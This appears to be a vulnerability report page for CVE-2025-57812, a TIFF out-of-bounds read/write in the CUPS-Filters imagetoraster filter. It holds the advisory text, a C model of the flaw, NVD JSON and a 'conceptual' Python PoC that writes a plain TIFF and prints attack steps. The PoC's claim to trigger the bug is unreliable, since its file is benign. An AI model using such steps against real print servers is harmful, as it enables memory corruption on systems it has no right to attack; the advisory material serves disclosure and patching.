Security Vulnerability Report
CVE-2025-57812 CVSS 3.7 LOW

CVE-2025-57812

Published: 2025-11-12 19:15:37
Last Modified: 2026-01-20 18:11:15

Description

CUPS is a standards-based, open-source printing system, and `libcupsfilters` contains the code of the filters of the former `cups-filters` package as library functions to be used for the data format conversion tasks needed in Printer Applications. In CUPS-Filters versions up to and including 1.28.17 and libcupsfilters versions 2.0.0 through 2.1.1, the `imagetoraster` filter of CUPS-Filters has an out-of-bounds read/write vulnerability in the processing of TIFF image files.

While the pixel buffer is allocated with the number of pixels times a pre-calculated bytes-per-pixel value, the function which processes these pixels is called with a size of the number of pixels times 3. When suitable inputs are passed, the bytes-per-pixel value can be set to 1 and bytes outside of the buffer bounds get processed.

In order to trigger the bug, an attacker must issue a print job with a crafted TIFF file, and pass appropriate print job options to control the bytes-per-pixel value of the output format. They must choose a printer configuration under which the `imagetoraster` filter or its C-function equivalent `cfFilterImageToRaster()` gets invoked.

The vulnerability exists in both CUPS-Filters 1.x and the successor library libcupsfilters (CUPS-Filters 2.x). In CUPS-Filters 2.x, the vulnerable function is `_cfImageReadTIFF()` in libcupsfilters. When this function is invoked as part of `cfFilterImageToRaster()`, the caller passes a look-up table, and the out-of-bounds memory access happens while that table is processed. In CUPS-Filters 1.x, the equivalent functions are all found in the cups-filters repository, which is not split into subprojects yet, and the vulnerable code is in `_cupsImageReadTIFF()`, which is called through `cupsImageOpen()` from the `imagetoraster` tool.

A patch is available in commit b69dfacec7f176281782e2f7ac44f04bf9633cfa.
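The size mismatch described above, as an added C example (a simplified model, not code from cups-filters or libcupsfilters and not the upstream patch). All function names are hypothetical; it shows how far a pass of fixed length pixels × 3 reaches past a buffer sized pixels × bytes-per-pixel, and a look-up-table pass that is handed the buffer capacity and refuses a longer length.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Simplified model with hypothetical names; not libcupsfilters code. */
/* Row buffer size: pixels * bytes-per-pixel; 0 on zero input or overflow. */
size_t row_alloc_bytes(size_t pixels, size_t bpp)
{
    if (pixels == 0 || bpp == 0 || pixels > SIZE_MAX / bpp)
        return 0;
    return pixels * bpp;
}

/* Bytes a pass of fixed length pixels * 3 touches beyond that buffer. */
size_t overrun_bytes(size_t pixels, size_t bpp)
{
    size_t alloc = row_alloc_bytes(pixels, bpp);
    if (alloc == 0 || pixels > SIZE_MAX / 3)
        return 0;
    return pixels * 3 > alloc ? pixels * 3 - alloc : 0;
}

/* LUT pass that takes the buffer capacity and refuses a longer length. */
int apply_lut_bounded(unsigned char *buf, size_t cap, size_t len,
                      const unsigned char lut[256])
{
    if (buf == NULL || len > cap)
        return -1;
    for (size_t i = 0; i < len; i++)
        buf[i] = lut[buf[i]];
    return 0;
}

/* One row through the bounded pass; mult = 3 is the mismatched length. */
int process_row(size_t pixels, size_t bpp, size_t mult)
{
    unsigned char lut[256];
    size_t cap = row_alloc_bytes(pixels, bpp);
    if (cap == 0 || mult == 0 || pixels > SIZE_MAX / mult)
        return -1;
    unsigned char *row = calloc(cap, 1);
    if (row == NULL)
        return -1;
    for (int i = 0; i < 256; i++)
        lut[i] = (unsigned char)(255 - i);  /* constructed inversion table */
    int rc = apply_lut_bounded(row, cap, pixels * mult, lut);
    free(row);
    return rc;
}
```

With 100 pixels and a bytes-per-pixel value of 1, `overrun_bytes()` reports 200 bytes past the allocation, and `process_row()` rejects the ×3 length while accepting the length that matches the allocation.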

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openprinting:cups-filters:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:openprinting:libcupsfilters:*:*:*:*:*:*:*:* - VULNERABLE
CUPS-Filters < 1.28.18
libcupsfilters 2.0.0 - 2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-57812 PoC - CUPS imagetoraster TIFF OOB Read/Write
Note: This is a conceptual PoC for educational purposes only.
"""
import struct

from PIL import Image


def create_malicious_tiff(output_path):
    """
    Create a malicious TIFF file that triggers the OOB vulnerability.

    The vulnerability occurs when:
    1. Image has specific dimensions
    2. Bytes per pixel value can be controlled via print options
    3. The filter processes pixels with size = pixels * 3 instead of
       pixels * bytes_per_pixel
    """
    # Create a simple TIFF image
    width, height = 100, 100
    img = Image.new('RGB', (width, height), color='red')
    img.save(output_path, format='TIFF')

    print(f"[+] Created TIFF file: {output_path}")
    print(f"[+] Image dimensions: {width}x{height}")
    print("[*] To trigger vulnerability, print this file with options that set bytes-per-pixel=1")
    return output_path


def create_exploit_tiff_manual(output_path):
    """
    Manual TIFF construction for more control over exploit parameters.
    """
    num_entries = 9
    # Pixel data follows the 8-byte header and the IFD
    # (2-byte entry count + 12 bytes per entry + 4-byte next-IFD offset)
    data_offset = 8 + 2 + num_entries * 12 + 4

    # TIFF header
    tiff_header = b'II'                   # Little-endian
    tiff_header += struct.pack('<H', 42)  # TIFF magic number
    tiff_header += struct.pack('<I', 8)   # Offset to first IFD

    # IFD: the entry count precedes the entries
    ifd = struct.pack('<H', num_entries)
    # ImageWidth
    ifd += struct.pack('<HHII', 256, 3, 1, 100)  # SHORT, count=1, value=100
    # ImageLength
    ifd += struct.pack('<HHII', 257, 3, 1, 100)  # SHORT, count=1, value=100
    # BitsPerSample
    ifd += struct.pack('<HHII', 258, 3, 1, 8)    # SHORT, count=1, value=8
    # Compression
    ifd += struct.pack('<HHII', 259, 3, 1, 1)    # SHORT, no compression
    # PhotometricInterpretation
    ifd += struct.pack('<HHII', 262, 3, 1, 2)    # SHORT, RGB
    # StripOffsets
    ifd += struct.pack('<HHII', 273, 4, 1, data_offset)  # LONG
    # SamplesPerPixel
    ifd += struct.pack('<HHII', 277, 3, 1, 3)    # SHORT, 3 for RGB
    # RowsPerStrip
    ifd += struct.pack('<HHII', 278, 3, 1, 100)  # SHORT
    # StripByteCounts
    ifd += struct.pack('<HHII', 279, 4, 1, 100 * 100 * 3)  # LONG
    # IFD ending
    ifd += struct.pack('<I', 0)  # Next IFD offset

    # Image data: constant 0x41 filler bytes
    image_data = b'\x41' * (100 * 100 * 3)

    with open(output_path, 'wb') as f:
        f.write(tiff_header + ifd + image_data)

    print(f"[+] Created exploit TIFF: {output_path}")


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-57812 PoC - CUPS imagetoraster OOB Vulnerability")
    print("=" * 60)

    output_file = "malicious_cups.tif"
    create_malicious_tiff(output_file)

    print("\n[*] Attack scenario:")
    print("1. Upload the malicious TIFF to target system")
    print("2. Submit print job with options to set output format")
    print("3. CUPS imagetoraster filter processes the file")
    print("4. OOB read/write occurs due to buffer size mismatch")
    print("\n[!] Use only in authorized testing environments")
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57812", "sourceIdentifier": "[email protected]", "published": "2025-11-12T19:15:36.753", "lastModified": "2026-01-20T18:11:14.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CUPS is a standards-based, open-source printing system, and `libcupsfilters` contains the code of the filters of the former `cups-filters` package as library functions to be used for the data format conversion tasks needed in Printer Applications. In CUPS-Filters versions up to and including 1.28.17 and libscupsfilters versions 2.0.0 through 2.1.1, CUPS-Filters's `imagetoraster` filter has an out of bounds read/write vulnerability in the processing of TIFF image files. While the pixel buffer is allocated with the number of pixels times a pre-calculated bytes-per-pixel value, the function which processes these pixels is called with a size of the number of pixels times 3. When suitable inputs are passed, the bytes-per-pixel value can be set to 1 and bytes outside of the buffer bounds get processed. In order to trigger the bug, an attacker must issue a print job with a crafted TIFF file, and pass appropriate print job options to control the bytes-per-pixel value of the output format. They must choose a printer configuration under which the `imagetoraster` filter or its C-function equivalent `cfFilterImageToRaster()` gets invoked. The vulnerability exists in both CUPS-Filters 1.x and the successor library libcupsfilters (CUPS-Filters 2.x). In CUPS-Filters 2.x, the vulnerable function is `_cfImageReadTIFF() in libcupsfilters`. When this function is invoked as part of `cfFilterImageToRaster()`, the caller passes a look-up-table during whose processing the out of bounds memory access happens. 
In CUPS-Filters 1.x, the equivalent functions are all found in the cups-filters repository, which is not split into subprojects yet, and the vulnerable code is in `_cupsImageReadTIFF()`, which is called through `cupsImageOpen()` from the `imagetoraster` tool. A patch is available in commit b69dfacec7f176281782e2f7ac44f04bf9633cfa."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:cups-filters:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.28.17", "matchCriteriaId": "42C7C112-8589-4446-9913-BE797ECE4EC7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:libcupsfilters:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.1", "matchCriteriaId": "4EA9B74A-E657-47C1-9E51-C028FF6656EF"}]}]}], "references": [{"url": 
"https://github.com/OpenPrinting/cups-filters/blob/3c58463e341b12c9d30d7d3807d2bac1bc595a78/cupsfilters/image-tiff.c#L34", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/OpenPrinting/cups-filters/blob/3c58463e341b12c9d30d7d3807d2bac1bc595a78/filter/imagetoraster.c#L613", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/OpenPrinting/libcupsfilters/blob/33421982e10f6a14bc0bab03b80c9cf4660e8d7d/cupsfilters/image-tiff.c#L32", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/OpenPrinting/libcupsfilters/commit/b69dfacec7f176281782e2f7ac44f04bf9633cfa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-jpxg-qc2c-hgv4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/12/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}